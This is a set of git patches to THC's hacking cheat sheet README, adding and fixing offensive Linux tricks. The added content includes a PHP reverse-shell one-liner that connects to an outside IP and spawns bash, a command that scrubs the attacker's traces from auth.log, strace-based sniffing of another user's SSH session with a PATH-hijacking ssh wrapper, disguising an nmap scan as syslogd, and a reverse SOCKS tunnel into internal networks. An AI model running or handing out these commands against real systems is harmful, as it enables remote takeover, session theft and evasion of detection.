From 562edafa53273bf6edb61e341830e949c7296f5f Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:18:59 +0000
Subject: [PATCH 01/11] Update README.md
reverse shell with PHP
---
README.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/README.md b/README.md
index f139f73..4cc599c 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [without Bash](#rswob-anchor)
1. [with Python](#rswpy-anchor)
1. [with Perl](#rswpl-anchor)
+ 1. [with PHP](#rswphp-anchor)
1. [Upgrading the dumb shell](#rsu-anchor)
1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
@@ -292,6 +293,12 @@ $ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprot
# method 2
$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```
+
+**5.i.e. Reverse shell with PHP**
+
+```
+php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
+```
From 4f0babe97be27271f4097fc8c1f4ee182beaf580 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:27:18 +0000
Subject: [PATCH 02/11] Update README.md
tiny url
---
README.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 4cc599c..2c72d11 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,7 @@
# THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
+## Available at [https://tiny.cc/thctricks](https://tiny.cc/thctricks)
+
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.
From e123304794184b2e9a667b4139f8b27bef9dda8e Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:29:36 +0000
Subject: [PATCH 03/11] Update README.md
typo. thanks acp.
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 2c72d11..86cc61b 100644
--- a/README.md
+++ b/README.md
@@ -148,7 +148,7 @@ Binary files transfer badly over a terminal connection. There are many ways to c
Encode:
```
-$ uuencode /etc/issue.net issuer.net-COPY
+$ uuencode /etc/issue.net issue.net-COPY
begin 644 issue-net-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
From 1bd7ad4de87ee88804d384675875a74dc4d8967c Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:46:38 +0000
Subject: [PATCH 04/11] Update README.md
clearnup and ssh strace fix
---
README.md | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 86cc61b..66c1de0 100644
--- a/README.md
+++ b/README.md
@@ -391,6 +391,7 @@ This will reset the logfile to 0 without having to restart syslogd etc:
This will remove any sign of us from the log file:
```
+# cd /dev/shm
# grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
```
@@ -446,8 +447,7 @@ Store data in `/mnt/crypted`, then unmount:
**8.i. Sniff a user's SSH session**
```
-$ strace -p -e trace=read -o ~/.ssh/ssh_log.txt
-$ grep 'read(4' ~/.ssh/ssh_log.txt | cut -f1 -d\"
+$ strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
```
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
@@ -458,11 +458,10 @@ Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strac
Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
```
-# Add ~/.ssh to the execution PATH variable so our 'ssh' is executed instead of the real ssh:
+# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile
-# Create our log directory and our own ssh binary
-$ mkdir ~/.ssh/.logs
+# Create a log directory and our own ssh binary
$ mkdir -p ~/.local/bin ~/.ssh/logs
$ cat >~/.local/bin/ssh
From cbd4599e382f64b1564062d5375b6299a47a3fc5 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:11:14 +0000
Subject: [PATCH 05/11] Update README.md
shar hacks.
---
README.md | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
diff --git a/README.md b/README.md
index 66c1de0..59818ae 100644
--- a/README.md
+++ b/README.md
@@ -24,6 +24,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [uuencode](#feu-anchor)
1. [openssl](#feo-anchor)
1. [xxd](#fex-anchor)
+ 1. [Multiple binaries](#xeb-anchor)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
5. [Reverse Shell / Dumb Shell](#rs-anchor)
@@ -195,6 +196,27 @@ Decode:
```
$ xxd -p -r >issue.net-COPY
```
+
+**4.iii. File Encoding - Multiple Binaries**
+
+Method 1: Using *shar* to create a self extracting shell script with binaries inside:
+```
+$ shar *.png *.c >stuff.shar
+```
+Transfer *stuff.shar* to the remote system and execute it:
+```
+$ chmod 700 stuff.shar
+$ ./stuff.shar
+```
+
+Method 1: Using *tar*
+```
+$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
+```
+Transfer *stuff.tgz.b64* to the remote system and execute:
+```
+$ openssl base64 -d | tar xfz -
+```
**4.iv. File transfer - using *screen* from REMOTE to LOCAL**
From b3d88de8599d0908a02fa71eacaba66369ef8067 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:13:18 +0000
Subject: [PATCH 06/11] Update README.md
typo. link.
---
README.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 59818ae..bd68fe8 100644
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [uuencode](#feu-anchor)
1. [openssl](#feo-anchor)
1. [xxd](#fex-anchor)
- 1. [Multiple binaries](#xeb-anchor)
+ 1. [Multiple binaries](#feb-anchor)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
5. [Reverse Shell / Dumb Shell](#rs-anchor)
@@ -197,7 +197,7 @@ Decode:
$ xxd -p -r >issue.net-COPY
```
-**4.iii. File Encoding - Multiple Binaries**
+**4.iv. File Encoding - Multiple Binaries**
Method 1: Using *shar* to create a self extracting shell script with binaries inside:
```
@@ -219,7 +219,7 @@ $ openssl base64 -d | tar xfz -
```
-**4.iv. File transfer - using *screen* from REMOTE to LOCAL**
+**4.v. File transfer - using *screen* from REMOTE to LOCAL**
Transfer a file FROM the remote system to your local system:
@@ -246,7 +246,7 @@ $ rm -rf screen-xfer.txt
```
-**4.v. File transfer - using *screen* from LOCAL to REMOTE**
+**4.vi. File transfer - using *screen* from LOCAL to REMOTE**
On your local system (from within a different shell) encode the data:
```
From 8a625e56af853682eea144643f77eef75d4a3fb6 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:14:23 +0000
Subject: [PATCH 07/11] Update README.md
tar method 2
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index bd68fe8..21ef4e4 100644
--- a/README.md
+++ b/README.md
@@ -209,7 +209,7 @@ $ chmod 700 stuff.shar
$ ./stuff.shar
```
-Method 1: Using *tar*
+Method 2: Using *tar*
```
$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
```
From 3d81fccf685a837607ee4fb4d8a25cc8913482c4 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:51:26 +0000
Subject: [PATCH 08/11] Update README.md
hide you commands...
---
README.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/README.md b/README.md
index 21ef4e4..c444771 100644
--- a/README.md
+++ b/README.md
@@ -75,6 +75,11 @@ $ id
**1.ii. Hide your command**
+```
+$ exec -a syslogd nmap -T0 10.0.2.1/24
+```
+
+Alternative if there is no Bash:
```
$ cp `which nmap` syslogd
$ PATH=.:$PATH syslogd -T0 10.0.2.1/24
From 449d3c6fe7f156248a15542dc53bf43f0acf09d4 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:02:53 +0000
Subject: [PATCH 09/11] Update README.md
ssh -R reverse socks proxy
---
README.md | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/README.md b/README.md
index c444771..97f1de3 100644
--- a/README.md
+++ b/README.md
@@ -16,6 +16,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [Almost invisible SSH](#ais-anchor)
1. [SSH tunnel OUT](#sto-anchor)
1. [SSH tunnel IN](#sti-anchor)
+ 1. [SSH socks5 IN](#ssi-anchor)
3. [Network](#network-anchor)
1. [ARP discover computers on the local network](#adln-anchor)
1. [Monitor all new TCP connections](#mtc-anchor)
@@ -117,6 +118,17 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
```
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
+
+**2.iv SSH sock4/5 IN**
+
+OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
+
+In this example anyone configuring host.org:1080 as their SOCKS4/5 proxy can connect to any internal computers on any port that are accessible to the system where *ssh* was executed:
+
+```
+$ ssh -R 1080 user@host.org
+```
+
---
From a488a678c5765ecc50b4c8bd79e4d46262ec5dc2 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:03:13 +0000
Subject: [PATCH 10/11] Update README.md
sockSSSS
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 97f1de3..8813579 100644
--- a/README.md
+++ b/README.md
@@ -119,7 +119,7 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
-**2.iv SSH sock4/5 IN**
+**2.iv SSH socks4/5 IN**
OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
From ca8297287fbaaab73b8b7340b4a44f4d20d8ee15 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:03:44 +0000
Subject: [PATCH 11/11] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8813579..b7c8c09 100644
--- a/README.md
+++ b/README.md
@@ -118,7 +118,7 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
```
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
-
+
**2.iv SSH socks4/5 IN**
OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.